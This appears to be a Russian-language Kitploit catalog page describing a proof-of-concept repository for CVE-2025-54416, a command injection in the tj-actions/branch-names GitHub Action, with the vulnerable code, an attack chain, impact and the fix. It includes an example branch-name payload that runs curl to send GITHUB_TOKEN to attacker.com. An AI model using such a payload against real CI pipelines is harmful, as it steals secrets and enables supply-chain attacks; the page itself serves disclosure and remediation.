Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
atlas-tj-actions-poc — PoC для CVE-2025-54416 tj-actions/branch-names внедрение команд | Kitploit
Инструменты/GitHubGitHub/hexbornestudio/atlas-tj-actions-poc
Анализ уязвимостейЭксплуатацияЭксфильтрация данныхКомандование и УправлениеБезопасность Цепочки ПоставокОбучение и Образование
GitHubhexbornestudio/atlas-tj-actions-poc

atlas-tj-actions-poc

PoC для CVE-2025-54416 tj-actions/branch-names внедрение команд

Репозиторий
35 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-54416: tj-actions/branch-names Эксплуатация внедрения команд (PoC)

Этот репозиторий демонстрирует CVE-2025-54416, критическую уязвимость внедрения команд в tj-actions/branch-names, затрагивающую более 5 000 публичных репозиториев.

Уязвимость

Действие GitHub tj-actions/branch-names (версии ≤ 8.2.1) использует небезопасный eval printf "%s", что после корректной санитизации вновь вводит риски внедрения команд.

root@kitploit:~
# Vulnerable code pattern in tj-actions/branch-names:
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"

Цепочка атаки

  1. Злоумышленник создает ветку с вредоносным именем, содержащим shell-команды
  2. Рабочий процесс жертвы использует tj-actions/[email protected] для извлечения имени ветки
  • Извлеченное имя ветки (с полезной нагрузкой злоумышленника) используется в последующих shell-командах
  • Команда выполняется в контексте CI-раннера с привилегиями раннера
  • Секреты (ключи AWS, GITHUB_TOKEN и т.д.) похищаются
  • Пример полезной нагрузки

    Имя ветки: main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)

    Когда рабочий процесс запускается:

    root@kitploit:~
    echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
    # Actual output: IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
    # The $(...) is evaluated by the shell, exfiltrating GITHUB_TOKEN
    

    Воздействие

    • Кража конфиденциальных секретов (ключи AWS, API-токены, GITHUB_TOKEN)
    • Неавторизованные изменения кода
    • Вредоносная отправка образов в производственные реестры
    • Атаки на цепочку поставок через скомпрометированный CI/CD

    Исправление

    Обновитесь до tj-actions/branch-names@v9 или новее, где eval printf "%s" заменен на безопасные вызовы printf.

    Ссылки

    • Консультация GitHub GHSA-gq52-6phf-x2r6
    • CVE-2025-54416
    Скачать инструмент